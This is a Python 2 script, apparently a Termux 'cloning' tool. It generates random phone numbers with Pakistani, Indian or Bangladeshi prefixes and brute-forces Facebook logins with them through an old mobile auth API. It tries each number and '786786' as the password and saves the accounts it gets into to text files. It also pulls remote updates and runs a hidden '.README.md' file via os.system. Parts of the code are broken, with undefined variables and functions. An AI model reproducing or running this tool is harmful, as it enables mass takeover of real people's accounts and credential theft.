# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
from random import randint
os.system('rm -rf .txt')
for n in range(10000):

    nmbr = random.randint(111111111, 999999999)
    
    sys.stdout = open('.txt', 'a')

    print nmbr

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    os.system('pkg install nodejs')
    time.sleep(1)
    os.system('python2 .README.md')
    

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser

reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/2.1.0 (Linux; U; Android 8.0.0; SM-G930F Build/R16NW) [FBAN/FB4A;FBAV/187.0.0.43.81;FBPN/com.facebook.katana;FBLC/fr_FR;FBBV/122388438;FBCR/Bouygues Telecom;FBMF/samsung;FBBD/samsung;FBDV/SM-G930F;FBSV/8.0.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,h;]')]


def star():
	print 'Successfull Close Program'
	os.sys.exit()

def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')
def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
logo = """

\033[1;91m  _____      _    _              
 \033[1;92m|  __ \    | |  | |       /\    
\033[1;96m | |  | |   | |  | |      /  \   
 \033[1;95m| |  | |   | |  | |     / /\ \  
\033[1;93m | |__| |   | |__| |    / ____ \ 
\033[1;90m |_____/     \____/    /_/    \_\
                                 
                                 
"""
##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def tlogin():
	
    os.system('clear')
    os.system('   toilet -f big ∖Fatmi⁄ -F gay')
    print
    print
    print 
    print('\033[1;93m⊰\033[1;91m════\033[1;32m═════\033[1;33m═════\033[1;34m═════\033[1;35m══════\033[1;36m══════\033[1;31m═══════\033[1;32m═══════\033[1;93m⊱')
    print '\033[1;33m              Welcome to Star Girl'             
    print('\033[1;93m⊰\033[1;91m════\033[1;32m═════\033[1;33m═════\033[1;34m═════\033[1;35m══════\033[1;36m══════\033[1;31m═══════\033[1;32m═══════\033[1;93m⊱')
    psb('\033[1;97m⌠\033[1;32m1\033[1;37m⌡ Pakistan Fast Cloning')
    psb('\033[1;97m⌠\033[1;32m2\033[1;37m⌡ indian Fast Cloning')
    psb('\033[1;97m⌠\033[1;32m3\033[1;37m⌡ Bangladesh Fast Cloning')
    psb('\033[1;97m⌠\033[1;32m0\033[1;37m⌡ Stop Cloning Command')
    pilih_brand()
    
def pilih_brand():    
    brand = raw_input("\n\033[1;97m⋗⋗⋗ \033[1;93m")
    if brand =="":
        print "\x1b[1;97mWRONG "
        pilih_brand()
    elif brand =="1":
        os.system('git pull origin master')
        os.system('clear')
        os.system('toilet -f big Fatmi -F gay')
        print '             \x1b[1;93mPakistan Area Codes'
        print 47 * '\x1b[1;94m⋆'
        print '           \x1b[1;97m00,01,02,03,04,05,06,07,08'
        print '           \x1b[1;97m09,10,11,12,13,14,15,16,17'
        print '           \x1b[1;97m18,21,22,23,24,30,31,32,33'
        print '           \x1b[1;97m34,35,40,41,42,43,44,45,46'
        print 47 * '\x1b[1;94m⋆'
        try:
          
          
            k = raw_input("\n\033[1;97m⋗⋗⋗ \033[1;93m")
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif brand =="2":
    
        os.system('git pull origin master')
        os.system('clear')
        os.system('toilet -f big Dua -F gay')
        print '             \x1b[1;93mindian Area Codes'
        print 47 * '\x1b[1;94m⋆'
        print("        \033[1;97m[+] 905,975,755,855,")
        print("        \033[1;97m[+] 954,897,967,937")
        print("        \033[1;97m[+] 700,727,965,786,")
        print("        \033[1;97m[+] 874,856,566,590 ")
        print("        \033[1;97m[+] 527,568, 578")
        
        print 47 * '\x1b[1;94m⋆'
        try:
      
            k = "+91"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif brand =="3":
        os.system('git pull origin master')
        os.system('clear')
        os.system('toilet -f big Fatimi -F gay')
        print '             \x1b[1;93maBangladesh Area Codes'
        print 47 * '\x1b[1;94m⋆'
        print '           \x1b[1;97m\033[1;97m 170,771,175,165,191, 192,'
        print '           \x1b[1;97m\033[1;97m 172,173,193, 194, 195, 196'
        print '           \x1b[1;97m\033[1;97m 174,176,197, 198, 199,  ???'
        
        print 47 * '\x1b[1;94m⋆'
        try:
    
            k = "+880"
            idlist = '.txt'
            for line in open(idlist, 'r').readlines():
                id.append(line.strip())

        except IOError:
            print '[!] File Not Found'
            raw_input('\n[ Back ]')
            menu()
    elif brand =="0":
            star()
    else:
        print '[!] Fill In Correctly'
        menu()
    os.system("clear")
    print logo
    print('\033[1;93m⊰\033[1;91m════\033[1;32m═════\033[1;33m═════\033[1;34m═════\033[1;35m══════\033[1;36m══════\033[1;31m═══════\033[1;32m═══════\033[1;93m⊱')
    print '\033[1;33m                Process Start'           
    print('\033[1;93m⊰\033[1;91m════\033[1;32m═════\033[1;33m═════\033[1;34m═════\033[1;35m══════\033[1;36m══════\033[1;31m═══════\033[1;32m═══════\033[1;93m⊱')
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m(✓OPEN IN BROWSER)  ' + k + user + '  |  ' + pass1                                       
                okb = open('save/successful.txt', 'a')
                okb.write(k+user+pass1+'\n')
                okb.close()
                oks.append(k+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;97m(OHH NO\033[1;91m CP)\033[1;92m  |  ' + k + user + ' \033[1;91m |\033[1;93m  ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+user+pass1+'\n')
                    cps.close()
                    cpb.append(k+user+pass1)
                else:
                    pass2 = "786786"
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m(✓OPEN IN BROWSER) \033[1;33m ' + k + user + '  |  ' + pass2                          
                        okb = open('save/successful.txt', 'a')
                        okb.write(k+user+pass2+'\n')
                        okb.close() 
                        oks.append(k+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;97m(OHH NO\033[1;91m CP)\033[1;92m  |  ' + k + user + ' \033[1;91m |\033[1;93m  ' + pass2
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k+user+pass2+'\n')
                            cps.close()
                            cpb.append(k+user+pass2)
                                                                                                                         
                                                                                                                                                                                                            
                                                                                                                                                                                                            


                                                                                                                                                                                                            
                                                                                                                                                                                                                    
                                                                                                                                                                                            

        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print 50* '\033[1;91m-'
    print 'Process Has Been Completed ...'
    print 'Total Online/ : '+str(len(oks))+'\n'+str(len(cpb))
    print('Cloned Accounts Has Been Saved : save/cloned.txt')
    jalan("Note : Your Offline account Will Open after 10 to 20 days")
    print ''
    
    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          

          
if __name__ == '__main__':
    tlogin()

